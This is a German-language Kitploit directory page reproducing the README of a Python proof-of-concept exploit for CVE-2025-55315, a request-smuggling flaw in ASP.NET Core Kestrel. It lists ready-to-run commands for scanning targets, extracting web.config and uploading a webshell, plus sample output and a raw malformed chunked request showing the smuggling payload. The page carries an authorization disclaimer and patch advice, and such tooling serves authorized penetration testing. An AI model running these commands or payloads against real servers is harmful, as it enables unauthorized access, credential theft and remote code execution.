Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55315-PoC-Exploit — CVE-2025-55315 PoC Exploit | Kitploit
Tools/GitHubGitHub/zemarkhos/cve-2025-55315-poc-exploit
SchwachstellenscannerPayload-GenerierungExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubzemarkhos/cve-2025-55315-poc-exploit

CVE-2025-55315-PoC-Exploit

CVE-2025-55315 PoC Exploit

Repository anzeigen
859vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55315 Pentest-Tool

Tool zur Ausnutzung von HTTP-Request-Smuggling für ASP.NET Core Kestrel

Python Version CVE CVSS License


⚠️ RECHTLICHER HINWEIS

DIESES TOOL IST NUR FÜR AUTORISIERTE SICHERHEITSTESTS GEEIGNET!

  • Verwenden Sie es NUR auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben.
  • Unautorisierter Zugriff auf Computersysteme ist ILLEGAL.
  • Der Ersteller des Tools ist NICHT für Missbrauch verantwortlich.
  • Durch die Nutzung dieses Tools übernehmen Sie die volle rechtliche Verantwortung.

📋 Überblick

Professionelles Penetrationstest-Tool für CVE-2025-55315 (HTTP-Request-Smuggling-Schwachstelle in ASP.NET Core Kestrel). Dieses Tool ist für die Analyse einzelner Ziele mit umfassenden Exploit-Funktionen konzipiert.

Was ist CVE-2025-55315?

Eine kritische HTTP-Request-Smuggling-Schwachstelle im ASP.NET Core Kestrel-Webserver (CVSS 9.9/10), die Angreifern Folgendes ermöglicht:

  • Authentifizierung umgehen
  • Anmeldedaten und Sitzungstokens stehlen
  • Server-Side Request Forgery (SSRF) durchführen
  • Caches vergiften
  • Webshells hochladen und Remote-Codeausführung erlangen

Betroffene Versionen:

  • .NET Core 3.0 bis .NET 9.0.9
  • Behoben in: .NET 8.0.21+, 9.0.10+, 10.0.0-rc2+

✨ Funktionen

Kernfunktionen

  • ✅ Analyse einzelner Ziele - Konzentrierter Penetrationstest auf ein bestimmtes Ziel
  • ✅ Automatische Endpunkt-Erkennung - Findet gängige ASP.NET Core-Endpunkte
  • ✅ Manueller Endpunkt-Test - Testen bestimmter interessanter Endpunkte
  • ✅ Schwachstellenerkennung - Präzise Erkennung von CVE-2025-55315
  • ✅ web.config-Extraktion - Konfigurationsdateien per Request-Smuggling auslesen
  • ✅ Webshell-Upload - Optionale Bereitstellung von Webshells
  • ✅ Detaillierte Berichte - Berichte im JSON- und Textformat
  • ✅ Sicherheitsfunktionen - Mehrere Bestätigungsabfragen bei destruktiven Aktionen

Technische Funktionen

  • Unterstützung für HTTP/1.1 und HTTPS
  • Unterstützung benutzerdefinierter Ports
  • Konfigurierbare Timeouts
  • Ausführlicher Debug-Modus
  • Farbcodierte Terminalausgabe
  • Umgehung der SSL-Zertifikatsprüfung (für Tests)

🔧 Installation

Voraussetzungen

# Python 3.7 or higher
python3 --version

# No external dependencies - uses only standard library

Download

# Clone or download the tool
git clone https://github.com/ZemarKhos/CVE-2025-55315-PoC-Exploit.git
cd CVE-2025-55315-PoC-Exploit

# Make executable
chmod +x cve_2025_55315_PoC.py

🚀 Schnellstart

Grundlegender Schwachstellenscan

python3 cve_2025_55315_PoC.py -t target.com

Das wird Folgendes tun:

  1. Serverinformationen sammeln
  2. Aktive Endpunkte automatisch erkennen
  3. Jeden Endpunkt auf CVE-2025-55315 testen
  4. Ergebnisse im Terminal anzeigen

Bestimmten Endpunkt testen

python3 cve_2025_55315_PoC.py -t target.com -e /api/login

Vollständiger Scan mit web.config-Extraktion

python3 cve_2025_55315_PoC.py -t target.com --read-config -o report.txt

Fortgeschritten: Vollständige Ausnutzung (nur mit Autorisierung!)

python3 cve_2025_55315_PoC.py \
  -t target.com \
  --read-config \
  --upload-shell \
  -v \
  -o full_report.txt

📖 Anwendungsbeispiele

Beispiel 1: Schneller Check

Szenario: Prüfen, ob der Produktionsserver verwundbar ist

python3 cve_2025_55315_PoC.py -t api.mycompany.com

Erwartete Dauer: 30-60 Sekunden


Beispiel 2: Detaillierter Scan

Szenario: Umfassender Endpunkt-Scan mit ausführlicher Ausgabe

python3 cve_2025_55315_PoC.py -t api.mycompany.com -v -o scan_results.txt

Erwartete Dauer: 2-5 Minuten


Beispiel 3: Mehrere Endpunkte anvisieren

Szenario: Bestimmte kritische Endpunkte testen

python3 cve_2025_55315_PoC.py \
  -t api.mycompany.com \
  -e /api/payment/process \
  -e /api/admin/users \
  -e /api/internal/config \
  -o critical_endpoints.txt

Beispiel 4: Nicht-SSL-Ziel

Szenario: Internen HTTP-Server testen

python3 cve_2025_55315_PoC.py \
  -t internal-api.local \
  -p 8080 \
  --no-ssl

📊 Kommandozeilenoptionen

usage: cve_2025_55315_PoC.py [-h] -t TARGET [-p PORT] [-e ENDPOINT]
                                  [--no-ssl] [--read-config] [--upload-shell]
                                  [-o OUTPUT] [-v] [--timeout TIMEOUT]

Required Arguments:
  -t, --target         Target hostname or URL (e.g., target.com)

Optional Arguments:
  -p, --port           Port number (default: 443 for SSL, 80 for non-SSL)
  -e, --endpoint       Specific endpoint(s) to test (can be used multiple times)
  --no-ssl             Disable SSL/HTTPS (use HTTP)
  --read-config        Attempt to read web.config file
  --upload-shell       Attempt webshell upload (requires confirmation)
  -o, --output         Save report to file
  -v, --verbose        Enable verbose output
  --timeout            Socket timeout in seconds (default: 10)

🔍 Die Ausgabe verstehen

Beispiel: Verwundbares System

Target: old-api.company.com:443
Vulnerable: YES - CRITICAL

--- Server Information ---
  server: Kestrel/8.0.15
  kestrel_detected: True
  http_version: 1.1

--- VULNERABLE ENDPOINTS (2) ---
  ✗ /api/login
    Details: Request smuggling successful - multiple responses
  ✗ /api/health
    Details: Request smuggling successful - multiple responses

--- SUCCESSFUL EXPLOITS ---
  ✓ web.config_read via /api/login

Interpretation:

  • 🔴 KRITISCHE SCHWACHSTELLE ERKANNT
  • 🔴 Mehrere Endpunkte sind verwundbar
  • 🔴 Die Konfigurationsdatei wurde erfolgreich extrahiert
  • ⚡ DRINGEND: Auf .NET 8.0.21+ oder 9.0.10+ aktualisieren

Beispiel: Sicheres System

Target: new-api.company.com:443
Vulnerable: NO - SECURE

--- Server Information ---
  server: Kestrel/9.0.10
  kestrel_detected: True
  http_version: 1.1

[SUCCESS] ✓ Endpoint NOT vulnerable (400 Bad Request)

✓ No vulnerable endpoints found - target may be patched

Interpretation:

  • ✅ SYSTEM IST SICHER
  • ✅ Es wird eine gepatchte Kestrel-Version ausgeführt
  • ✅ Alle fehlerhaften Anfragen wurden abgelehnt

🛡️ Sicherheit und Ethik

Autorisierungs-Checkliste

Stellen Sie vor der Ausführung dieses Tools sicher, dass:

  • Sie das Zielsystem besitzen, ODER
  • Sie eine schriftliche Genehmigung zum Testen haben, UND
  • das Sicherheitsteam benachrichtigt wurde, UND
  • Sie einen Rollback-Plan haben, UND
  • Sie die rechtlichen Auswirkungen verstehen

Integrierte Sicherheitsfunktionen

  1. Zweistufige Bestätigung - Das Tool fragt vor dem Start nach der Autorisierung
  2. Webshell-Upload-Bestätigung - Erfordert die Eingabe von „YES" in Großbuchstaben
  3. Ratenbegrenzung - Verzögerungen zwischen Anfragen während der automatischen Erkennung
  4. Timeout-Schutz - Verhindert hängende Verbindungen
  5. Detaillierte Protokollierung - Alle Aktionen werden für den Prüfpfad protokolliert

🔬 Technische Details

Ausnutzungstechnik

Das Tool nutzt CVE-2025-55315 mithilfe eines fehlerhaften Chunked-Transfer-Encodings aus:

POST /endpoint HTTP/1.1
Host: target.com
Transfer-Encoding: chunked

2;\n          ← VULNERABILITY: Lone \n instead of \r\n
XX
0\r\n
\r\n
GET /smuggled HTTP/1.1    ← This becomes a separate request
Host: target.com
Tool herunterladen